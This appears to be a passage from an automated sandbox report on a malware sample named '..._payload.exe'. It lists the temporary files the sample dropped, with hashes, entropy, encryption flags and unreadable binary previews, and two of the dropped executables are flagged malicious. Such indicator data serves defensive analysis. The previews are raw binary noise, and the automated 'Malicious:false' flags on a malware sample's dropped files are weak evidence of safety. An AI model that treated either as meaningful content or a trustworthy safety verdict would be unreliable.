                                                                                                                                                                      SHA-512:5E04ACCBCA6F2BCB4457D043D739AE0F1051F495DF97E64B7612AB7F852394E205D1C9E858184405BC0D740A5450E9913B79AD45BAAFCF97C11E0A09380F6E76
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram'....@f(b.6.Z..}....t..dL..JO.iPo.lC\whc!.5.>.db"Z..O...Y@.W..?d..3..3..r_)....NV...].........J.T..:A~D..........-...M:IU...p'.|8......4..aN.^e.T.;.73La....y..~..].\..|.|Jmk..VDLnhT...Cz...B..'z..(.....3.*....e...tQS.....6q].>5..}O+..f....qW.p"dk..cj.kN.[V.:!.........I.D.....Q.O..M.O...>...T....q_o.7..B>..^.........0..Fi..u....qf.Y..pL).M{D..*.95....b.U..-.."...r._..0H.8.........,.q..I..........Gk....u.eA.TG..x..d.<:..6Z...0.@.9.gi....bK..>.t..v.K^......!..Cb..&..-\....8a)h......A.).L.Mm......;.R.<$[.6Ik..NF......4.0..c....8.....z.P.+...r..@..+$..m..+...'\..0a.....fm(G..............JS....*...~.l.A..q.).h.6........y=U.|5..LJ...@..:.}X.A.&@.R..6.W.O....p,...;...@....5DE.........`X..y.O{.e7.[Q.. Z.....p~....x.r../ubZ...x..>.d.m...R.-{AS...FqHEvu..OGhF..1.....6kAo....6....a LF.ET."P....ZQ...t..U#.ui..O.xJ'.RW. ..$..f..U.Q...3..6.T3..6.a..s..]qz...z........mkxj`6...|....\w6.i.7....Vy.z4..TQ.~.......}.G.{.}...].>1.. e.+...q...8.+I...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wct33D7.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997008322080646
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:W9PPDVhPFyxCRq42/ANVpHCdMowiO4KQ1ozfVkXR2g4x:WpPRNFygRMAXpiGowiu4WVA8
                                                                                                                                                                      MD5:353E6C2D5A794933FD8D11C0EC928C3B
                                                                                                                                                                      SHA1:7B92D4E05C7057B68AAEC5651A38F48A417A502B
                                                                                                                                                                      SHA-256:41847B2BE27CADA70044A673EE97AA32BC3FCFA5F698956080AFB5E3E52B2EEB
                                                                                                                                                                      SHA-512:D645AE741784F28E0716305E918481DEC0ED9752C4CB068B736D10B253C67CCB47044402259AE00110909675A2B4981E45B8B41BD046B1002F4321F06BD0DD68
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram.Y...&.U>T...;..^D...%....... .-Eb.:.._.....5A......=--s."<Q...^.n....9...p|. .!...I.......7.OW........g.<W..B..6......HF.....d.w.).q.3...).S.&..H...e.i..=...!.4..s..pk.0...s.p. s[..Q..b..+..R....O..;z...I:..M&(8.0.d}.;F.s.o..).&.<:.l...Q...I.9X\!b.....sMB.d.?...q.......G?..z3.H.@.6f.....@......:....d.....C.O.&~.I................\...:a].[.R'........N..ec..<C...zt....?.9.}.,.;..e......?Q...7..}..By.e..jV......:.........l."...B&.s..-J....9.D.....;3)..m+.........Q.R...4..v..G...sE+j..F"..W.......*b..T....]....).<J......m.....9>..........r^y..t..$.. 5...L..5.tk..@.$....:G*......D.^.Y....{E.......b...P...l(.G..4(....Fv.d..U.&0..M.+_.d..Uz...e.|s............%$....31E.e^.......w..g..........{:...U~...N.M...?.B..2.^....I.K.$....:....:...1.x.K...Z.%...<v...5.".C`..D..4q...E....<.K......}..#...e .i1....+.rG....q....f.....dFU.L...G...0tkke....?o!.....qb.)P#0.....X.X..p5.;>..@..b...L.7...ct....b..Q.2E...k.9x.#.y*.$......T....#.(.=.!.YQL.....3C.5t

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wct38F0.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997145089990632
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:yuu3KIt08khtn03FoY8490zxPmMyu8yJotU/5Eh5Tz3mOJsuXdPovYa:yuJKkhBOFCFPmnUOhLDDFoga
                                                                                                                                                                      MD5:B0195F01DFA88DCD06D18494E3006596
                                                                                                                                                                      SHA1:31FC930A940CFE6ADC59818831ABA78233658CB2
                                                                                                                                                                      SHA-256:3AF53E17A309941CBF2A71D9ECEB791414714B1D6D1A055EE8B1910EB9BA2B8E
                                                                                                                                                                      SHA-512:89DDF74985CFB8CC14C848943FC1B090B350B740EF6C0939D60934AC5B7021CEB5D88FC8B44000CCB70DAC9646F7E57358DF370A9484A1E2A0253CABCFAAE2EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram>...l.Q`..z....^..3.....}.L...k..n.Nd..u....J..guL..!.4Lu...vW.x.....Q....n........4.D..y~.....'....o.F`...M..1.Kg.......mE...N|...........]..r...D~$..W.(./.^3....#k..`I...'...y.z....6..x..){G\ ......L..U....K....0.9..{a......mq.y2..... ..7..e.h..../....<...-............Ms.:...>.6L..+...y..<.....S....1..Y.O.....0...^...Ni.O.........zm...].....;/h.p..C..\.(.@.Y..Z...+.(.o..2.%...D/fu.K......?|..[.+...?C=..e...j..mIsc.b5J.Qe......mR>Gh ....iP.k..b..n.8...........z...4q0...g>..sX.n^.sF.{...$..T0o2....._.E..8.qr.>.1.......N?m..}o.B..;...`....f..[.g...[7.".:..qZ. +....n....T.....#.U.&?.,,..K...J.\E.U/[.0.~.Z[..g.8...yb...K1.^.N".J.Wc.e.W.a-..js.$.]..B.Mv9.....)..Vt;v6...U.|..w.Q..R...|...........5.4..^.......A@./.,S.}Nt#E.I=.....5.O.....3..\..,6..#uW-.v....}.......gm..;..^........l.w.?...a6.>$ge........o$~T]..-..3i4.}.3IO.W.V....H..).z.Cc.z.S.3...1...N..E...k..r..S...~..1|..n..9h..4..5-vEE....1....W.Y...V..=..`.!.]BH]9|...Gx.....{....L.1.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wct3D66.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1601198
                                                                                                                                                                      Entropy (8bit):7.987451630407055
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:SDK0o270SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUg:S20L24gQu3TPZ2psFkiSqwozt
                                                                                                                                                                      MD5:7C75E2492E46302276B04D541D5797F4
                                                                                                                                                                      SHA1:88696AB0356824BA6A68ECD1A852E20257F24D0D
                                                                                                                                                                      SHA-256:D5C1EABDA90071846750011C06E82089C066D8B943367B263CCDAD5278D6F320
                                                                                                                                                                      SHA-512:03E2603F5DF1EB88F7BC6108BAB16197AC854313258B384B1F87A72645B58B363F00D9D702FFD83C4130AC8FA0DAD96EC908969CA24821D593E07357271B0EE2
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ.....M.9y.@.....5..M....T.F...siY.%.........X;.6^...[.R..|.....G{;.v...WX].....v..S>....9cY..!.73.q~.Pr..Z.<$..aO.....Q.\.P..$.I.*..B....4u.3.W.g.)W4..g\....K........cP.).-t.........+-...*X).P.l9:....>R...1......|m..3..m]..3...]'.....n......e.kV?....._..._.z....)&L...k......._.p......g.....m..{#=.....S.,.V.tl.cT.....w_al?.p..LpN.A.Z......cWdI..=,-...h~0.r...3.f.M.p.?...X..h2.9.L.,..#<8....W....Po.v4B.q...M.9.S...3.y.......\...q...;I.Z.....(`.?P=.7.}..w........9..#o;...0.H...J.u.C...}.....z...i.S.`..%.....N...h.f.d+..4...s."[...Y.{<...L..)C...?...%A.F..Q..q.;.K.z.'4....G:.:.Mb./C5C.[....W?..S......%......tA+..p.....'...i..n.:~...l..3'[...7s{.Q.~.W(...._..g.;..".gQ...}.w...1].*...8b....4@.4Rd?A.Q.U.$Z1...l.@}V...{...i..9%!..k.70..A...t......>.....W..".;.F.G...T+.....A ...r.Bk].7..xn..)"Q..]._.....T..`.,...[..D....{.)..lt...Xv..X...F#e...K.!>L.g-.[|2..a....Z.C...E...o....m..H7..Y.nq^q.....\..A.;..._...........5.l.. ....R%.....}.....]........;.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wct443C.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.9973360230375885
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:Irm+kbCdaJ07MpZ3txMfrSEnpbQboZZ54T7muF/3/Ae:Ia+rdai7oZ3zMLp8O+L3/x
                                                                                                                                                                      MD5:833F127D60D70FA87D8C25106C33B238
                                                                                                                                                                      SHA1:829BC64EC4B43311BFF1491F099BA1F6585888BD
                                                                                                                                                                      SHA-256:8B55287CCB43AB284610F070B8813C8DC0861E9C0F1114CCB6932EE262FE4710
                                                                                                                                                                      SHA-512:856F651585DA0EB2A149AAEE675D20569157F5F4EE1AF992AAC865A78C6E2FE2568D58B3E0E555C865070B5C3F432C10E7562C535B8CDEA552EF09CBBD564D83
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram;.#m@i.....gr..R=z..?..#a>..n....0.y".t.K..FI...G.3vS..m{.[.O.....}...v.V..IgW.z"7..o"...../...<h.[(.K(.X;..<.2.y..k....G.d...rJ,.N7..$@...z.M.4../..M....W...(.~..3....O0:.b.?-tL_..Z=....R...a...!.&."=....N.S.^.='j....n.a.:m..m..k]n..zhy.....u.0.]r.I...{......z.}..aB4..H....q.....&G..~..X..1.{.W..FYG....}.b....v\.c.........b.y.l}.~...~....%(.....e....'.e$.KJ.......1..p.'..........HI.........B... .E........YBy..w."...u8d(M....@r..fZK.-"....#.m$.....A..........\....6o...).........<]..u&.c.....K....f.kF..m..%..C..8r...D..p..uJ_e..^..... .:......T..>....2?g.o3F.vg+.....#....J......\..T}..6.......3......[U$.....J......oK....<......[.t.31<........m.c..{....`.e...CMU..1..cf...99.S..F.....Z.a.>8T.......T%.&qi#n.Y..e).Q,.F>veS.......s..e.d09.."}.U.@.|.. xl.u....B.,n.F@#>&..>...?......GW%.C\V.../..H../,^....u...P..\.?.....A-..f....k!.8%....q.1.r.1ei..zVr"..&....6%.&.'...Y.}vB.\...,x..u.%..ki......I..b5Vb'......:t7M.I.L.f.^.h....r.qj.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wct49A7.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997269298719015
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:1qoQ1g/PUZVijg/q6GhyFiXWHkyBYh4peoD3CV:aZVijzhDwCmM
                                                                                                                                                                      MD5:23AFA38672E5306295BCEC4CFF8F2FB7
                                                                                                                                                                      SHA1:5F60D42ADF89E69D0A2161686265EE6D508C596C
                                                                                                                                                                      SHA-256:D571222A65C88CF195C3F1BD2BE6F3B96E1F9098129A6D21F3A94294F25960EA
                                                                                                                                                                      SHA-512:92882014E5671634BBAF08F0DA7514B99D0A0102E1284E52289046E5C2A88AE970A1C74B27D8F9EB1994EAA4E7686E0019DD99CA3E65AADBE78F1A8C824637C1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram.g](.D...`..sX..yg.u.SLI.....].C.?.H...98....IF..=c5X..>....|..A.....?..j...e.[......SD)_.76AYeh..Y"R.. ...=...i.b..7X.*Q.-..n3I.QT5.{y.s.....K.V.m.....9s.!E..{wQ.a .*;y...].....[Q..a..E.Ld..vq...M..J+....W...].;|3LV.c.~4.6....k.1#.... .]O...@. I.x.!~...5~....."7...s.o>i.{F....>..haTS./.ni.H..A.f..E.g.;..X..k....].uk..us.(.-..WK..........Q..&.e.B...NR".2k37...n.U.5..3.&.p~.....&....d84..9....U..c4.h+...1JlN...N..Ii..<.a.k....{........NK..]f..=H.........%.5;..............x.la....^G.U.....b.9.#.H.!NL.G...A.kU.-G...J.....sg23.bn..Rt.Y.8......W~...-......s.H..S....t.@...3o..j.Inl.T........2..#..C[.....FE($5D#...'.2...v7....... ..w.$....Fm..&..*......_d .\,Y.<....K..1.I..a1.1.@A..d}..4x..6..J.eX.S..=..j.c....dy..1..T...W..7...E5R.f....jO...h.<...iDE.....1.J.n....WB..?...g.Y8.%.f1.M$.v..|.Y...=..I..J+A.y.d.g.Z....WY.......)g..^...`;d..(1.KRQXt..7^%,.P..h........m.CN4.......E4j..H..S-QYR..gP..h.o:....*Z...l}]@.........V..qT.H..[r....H

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wctAB5F.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997262806942996
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:R69DpP6GJBaAqZRKQ4sIs1GuzbZrd1XYZr6aFwMKM16ZxvS4C6wB4/C:Gi8BaZZRKfsp1GuzbNd1XIkM16bvbcoC
                                                                                                                                                                      MD5:A657D9DB1213C7FFB33358E0ABF32E43
                                                                                                                                                                      SHA1:EB88D4D73B258EFD38CBFD92C4C797A0E7776707
                                                                                                                                                                      SHA-256:7D988E7DFC771DDA2481502AA102BCD7EEF11534D38B9405D50A872FC907681B
                                                                                                                                                                      SHA-512:5CC6DEA85B26C6ED599232337FC5386B1496495B9CBB5D01CA9F9B26235C6CA2A27A3871FE988DD319F0B4647AA933DBA79F69ACAEFA73F8B3C0FA95515088D9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram.."?dt@n.s...6....cz.p.L..3....o6Yp+..U;q.9..../#v....h.K.&..6Q3r...i4....x.+..Z....'E .......a.t..vE.p..\p..B8...Y.[.R/........C.....4H .F...RGN...G.<....O.\. P...(`eYl"..._..A.y.h_ ..R..."j......r...?.N.2...l.E.......:.3.....?..3..5G.....R...G.......x8{U...T.L)....3,H..J3.@.D....m....)z...0..&W.S{.z..!,.).oJC.5..).8..6x.nO'~.W.?....)]....fte..C..4..u..W#}..|.5tlS.e.....Z.L.HkSF.>..}.......~O.d.v??.........).....".7..T.........`.k9....8....x...2.:..a..>.....6}.t7..L...?ob..:.$.-....;.!?.<..n...An2.F.w.D..!:...D..~n"K.......FJq..`....f....qo.#>..W [.&.I....Y0...<.T..P.>/.....z[cJ\......b....A.3.._...H.d...]_ ..Ua.]x.Dg]..jA5.6.g.}....".y]..............7=.D.t..Z..A....f;.r..u..^....A.2...../.W.~.z....i..........9..7..O..q../.j.RF......x...3..,...8.).\.pr.q].V8..;.:.\..^.i[.`..D.1&[..x<...e..m.VP5.... .3b.I.pk....4*7.n.u.../1,.m...$.Y.B...Q.......:j..ce.h.i........(.v....|&.v.....1......hjn~....c{.....'....>.'BJ.bN..e..G..N.}....qe..{S<...C

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wctDB2E.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997096675159365
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:kUoQic0SAV/2T50IV4QbwHqkXpbrj8yCQjzuRhvOO:Wc0SAcWIV4prj8w8l
                                                                                                                                                                      MD5:B473D3EF1AA4AB1EACC6D64885F53020
                                                                                                                                                                      SHA1:76A96E04E7E384AFFF919F470C5A417E709704C0
                                                                                                                                                                      SHA-256:6FCF3B6200C166CB830DBD2C74F2E202E48C20D9F02ECA2CF399F17297B980AF
                                                                                                                                                                      SHA-512:FC80BEFF467A376107C9D7FF8804F84F628ACBAE2DC38B3AABD03BEBEFBA561A8F94474DC3F8FA97BF4E00079C1EE62199F62C85149EA19FB8A2203F5252DA26
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram0........I.^.....4...........M...Jn.eB..-.c....U.!1*....D....A.E.G.w79h.<...k.a....:..7....3.K..{O...."K....>?......../...A....w......6.p..X.Q...1.7..f..4.....!.%I.6./\{..%@.......a$.E+....2{+..j.......k....5...E.'..j.*...1.....'..>..o..\..h.E.w$].$\7"W>..B.n:g..f.o..F.[....5\.[..K..m..4.....x...3.H...N.B.5H..C.0.b....NO.xV..>.s.B).....}.B....C(l.RX..B,..37|..I'..6.Z.. D....{$1D.[]H..)k../..G>S.>Y.x...(...+..^...oL..$1.?wAz~......B.Pc.)K.dI.E/.j"/.T.....3.......(....:...].^.....?..cp...p.6...b..>o.....cs^..".|....eA.....\...Gw..fz]..q.. .qu..e...-.`..u..l.i..f....A.T.PU...Q....n.D......~,..S.7+.....|P.|.H....2..Wf.../.........Rx.Z3..*..t..gT9.".l.2._..m....X(..ttv..K....rv.Mp..t..L.:.G..%8...>;..0...(.;J.7..rT0.*.0"..r...5.....Y..=Rj..A.;%9...-..M..X..q*....-...R.TI.....k....?.....O.z....jr.....Z.. .l.`......0"...[.aE....^jx...<W/..X..qye.T..ZoN.?.....2..{..B.a.=yz......kz..._..R...3Kz..'5..M..q|...Qe..G.....H..%..e...I..1.F+.S.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wctE4A4.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997584614740485
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:9l45XdGE9ETBDUfx/D9BJFzCxUUZi4KT3mjOTnxZKvHS9oGVJa:9lwXrEyfV95CLKT3mjKxYaoCM
                                                                                                                                                                      MD5:89E271A948FAA15DB9E98B18625D202C
                                                                                                                                                                      SHA1:FE79D1C277507BF71D2B56D4D6CBA319BBE8AA24
                                                                                                                                                                      SHA-256:FF96A9E9DC3781F70C35F9BA378B7D3A7119D837001142F4D4BB5D77D1859275
                                                                                                                                                                      SHA-512:822C8605C85D717306DF796F821EAE8417CD76BE3D77B4C60F9B526D484C12E23075F8622A69377A28BF07F083FD8B482A8121BD09A6DB7A754B8881FF00874A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram"f*i...vxYR.%..>.B...N=1....w.Fu.f.3!...#?9q......-F...|.@c?}F.i.u..}Z....QVa.qz....B...U.....:..NX.k.....'.......l.+D.gH..Ru.c|q.U...}3-..+$c.q..jY...d.dyG..........`.;..|.5U..]..2.....SZy.3.}.r......k..3.....6g8..W.)S.X|.Z.../..2....p..'.L...H..Gv.....Kd....G.....sC.%..(NIm.b...\1..&..T..x.......*.1HE.R..&..........p..-....."..e.....~z..M..&NBqn4o.)hsw.e$!F.`....O.'nve...Yz^..7mH...I.b..dfl.eu..`.t hg..X3....`6...M.....9Z...Y.p^..h.,.;.Dk.C.| ...]0..G.|.a.....|j...RD.he..b2.......].u.K.g....(....M....r@r#.N.c.1.7.....JI..1.<.E/i.]...kI.....3.#.ss.K...y4,D.&Z9..'k..K.9~.I.O.,.:......,...n.....J......|N\.U.w...DZ...iFEm.\n..3.(.......8.b..4g..^..j........I5.{..........E.%...&..&...-6..j..e%..P...,x..|zK..a2.GDOho.}..7.....\...2J......$.....W...vy.......C.~..k...\.]60L.!|.K.T!+.U...B..!uz.CL..de.p...C........\p..G.Uf./...8N.;,....HqY...|.}.:n3...*.R.q...>B..o\...~...k..9.'.M`3..H..%.B..m..eC'W[.....`(x~.rJ`rrSr9.6.........g...2!N..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wctEA40.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997211347285652
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:NeutngY44Ex562cIs7KbZ16KTGChrTXH/yNVnKbyP7CAe:NeCgY4XSI1EiXH/yNqg7Ct
                                                                                                                                                                      MD5:DC4604A65C5867D089BFC4C9848E9B53
                                                                                                                                                                      SHA1:4A4D1352F24CE3F9D1A76E47A814C0F42E494CF0
                                                                                                                                                                      SHA-256:9A5922697B5EDFC4E3A1A2D0FDBB1539ABF346CDD6DC56FA63E791D882BC6701
                                                                                                                                                                      SHA-512:EF7F6C1314BDBABE765F72B6D96C2C6AF9B5F06DA7A8CB55514AF1B04399829A6DD3F95929FA12513AB575F3C1998ABCE4BC8431FC05724AB8C235939E54BFE6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ram.Z..`..<h.........y.:EL..."...u.d.....5....4f.E...b.-{7td.....,3.....}.Ci+\.}.9......8.Ve.QJ.....~!$.2.on..|..x..qDB...X/..Sm.....1...}.F%u....'(.X.....%w{.,..hZ..=ch.H.ne>..U.....h(...V6$.../...Y-...\.M.?..S....>..#........k..E.C..I..'.....s...B._].6.9.6.{..........}I$m..}...H.S..w..Z|6.@....:7.$.=...$.....NY...k;...y.~..Z......~..6$._g0.A..m..Y.!..)........:..w.[|.......f$...8.....l..FV..]~8..A.. .Pn....XH6H...{..M+..%...<O7.....-.e...V...:5^;g..:-.....@.....)Zr.!,..n..z>.....q....OBl.7W.P.....l...**...".Y........Oa_..OD<......t..2....(..#..7.\Xx...Oe."..9.F...........q8.O...M...F...^..Ui..5..%.....a._.P]...F#.63..s.d..W........k.A.rJ..Ex.#,^5V.........V..t..K)......J.S..c..!.F.C.....^.a......CyS..f"......J.?.......'d".W...|R...7.[....v*csc-e...=..das...2......N#=.T....b.:....U.6..m-.h3.G..:,0$.B..1n._.....='7.{.R...8.Q.Wt.jo.i...v...A.N.e.c..6`..-..O...RZ.\U.[|..8.$cz.[.GH.eFf....?.C..f"=k..y...k...u.&WzX.y.....6$....h..T

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wctF411.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997810212418462
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:dQVdBjEXV27bw36SEYandD5SzLLHFzh6Cl83TO9BE/0Zb8hhSv:mV7El2703XGeLHLH2KvE/0Z4Mv
                                                                                                                                                                      MD5:ADA388B8B0776F416D3F21C1F5569491
                                                                                                                                                                      SHA1:545F0BBF095646D5BE9B81546DB602CC2E6342B0
                                                                                                                                                                      SHA-256:B9BE681CD4E39976AB3D37FD078E8CF624794DE44AFFB8ECE343614FF51B72C0
                                                                                                                                                                      SHA-512:5DD9DE45C3828949BB1A522FE8E1A9CB559677121B01120A42C0240A71BEB8672773AB7AC9EA0FDA57D1091AD21255E7D32BBAA64977798C43CF2E2F602708FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"ramg.........R......{......}.......Z$eg^....I..`.......s^L.....&de..)R......_LF."V.n.....t.u^r..4..X.....i.....u.._...1.!...9..}.d...l.I..;.....2C3F*[zu.|.Q.9b(.r.(...`,.ed...o..f...}.Y.....W(.#.p.....Xu.c|..I.C....H8....U..$}{.~.7.v..f...K..K.#m.ep.n...at.-E....G..S.C..su...j....i^.....~.......L.9._#..!.,)[.:j.4;.a...6.qkT..#.9.[^z...H..q....9...7....+h"..q.B.8p.D[..}K..... 2.....1..b..e|...>6.X..es..8..!.......h%.V.....|..6...tw..9K.x(M.eR...~.I.........GV.......-.K!...yt..#.....k......,!..l.....v.D..C......].....,....@.v.>Q.^.w..Ccu..^.1..;Y<.....].iD5/..|."fB........$(..b..k...........[.nsxs..:....&..Y..9Y........qU.'N*.H...S"../EX...5.,F..<..8...J{WL..(..X..MsX.<./6..Yv/R...%..52.R...i:.t.Co.N..z..(.|...cEup.)F.]L*..Jv.$..].... ....?....k...N...:i.{:...kjN.h..2:....g.E..K.3T.........h`{...S.J..8...X.".....uf....$.H..Z[.a..$.[49...[;....4...<........O.q.....T..?V.'.{.j....Ac.r.)i.(..n.q.....K..[8.6.F..hgl..u.o^..U.... .@..(F../...ED

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wctF86A.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):42164934
                                                                                                                                                                      Entropy (8bit):7.947669527692684
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:786432:HwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59N:QQcWxDMPnN+dk65gGUjku4vNjLjN
                                                                                                                                                                      MD5:A63E92C370B5B7528B392E48BF4AFF8B
                                                                                                                                                                      SHA1:84015AD81D6FBFB6157B57224A53EF5701292189
                                                                                                                                                                      SHA-256:2AE4E9F6E540AD0A1E58F09E54C6E5687EBCFA28C3CE7C80D10E673C96E7C8CA
                                                                                                                                                                      SHA-512:F8B45EDBDA434BA8059FE808A1A82BFFF1A4B078ED3E37AB4A6BD6D7862D6D58A29B5856019B09A19A2AEDF7B7BF9FC28499C4508131D51CCD12EF3DFE09CD75
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ...*.v...w.$W.7.&6..7..k40.p....3k*.ezqG._T......?.}]......q.B.l...Q.......JE..K....M.......oJ...E#.b....mb..@[`.MH... *.x..E....l...T.......R...i...Lt.M.!...R...._.?R.e.C^l7yHo..B....>..<.!o..4...k.#}0.!(Z...tu.K.....8n...&.p.v.0b.......m..G.....V<....3Q5EY~..b..u$.E`....h..S.[.....k([....t..k..+;..Htd..'...=...]S.....2.,D$...sQ]..=.07#4..&.x.c...*....oz0.<%8..;....5..q_O...>yH.s.z..?:.6.i.u.N+.2....'..I.+.u7.......l.J..B..3n6R[...;E..g./.)..gQ...n.$N.".=F.d,.[...|6 ..t0....i..9d]....X...G....Yk...3.i....-.s0.D9)i..o..i..w.L*..L."v._R..w.$}..!.i9\sI..t....g.?...y.Uo9.3.H...n..W..x...T.`....WT..pM.b....lK............'..O..z.....u.5.. .../...-...........t.Z..nwC.z.b..R6..~...Z3.D'.'.._L....P.*.|....#..Pw...........[=mI..=.E)X+..\.k..W.K.r].RkC....6.-......j+..'GQ`Q.c..k....qr.s...o.*..K.JZ.Nw%....@.?..x..U.KD.h..C....{....Ug...$._..F/..=..E.x.....p.D..;.1T......H....J......A....f.K7..c.>^..d-... dZB....u.FTGn..Ue........pI;..{.,`.7...i..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wmsetup.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                      Entropy (8bit):7.7700730740248884
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:twOexkBe2Pcal3WJEF8m33V+KvKFMLe42bD:qufPcgGU8m38prD
                                                                                                                                                                      MD5:AF4C389B634FECB5BFC56BBACA41F0DA
                                                                                                                                                                      SHA1:02462F8123CF7AA9371772CC631A18C4D5DCCA24
                                                                                                                                                                      SHA-256:E6CC9249F58EBA2D790EE3DEC96D1256C7F9ECE83CC71FDB11C95EB7FBE7E6B8
                                                                                                                                                                      SHA-512:424D6EA0033A7F281B96E6E8697ED6F45001E534E216BE9092B6954D0FB5A0B43EF813661FB1525C211BEAFA33349FBAC248C58D7BF552D85D5B1B6DE9760F00
                                                                                                                                                                      Malicious:false
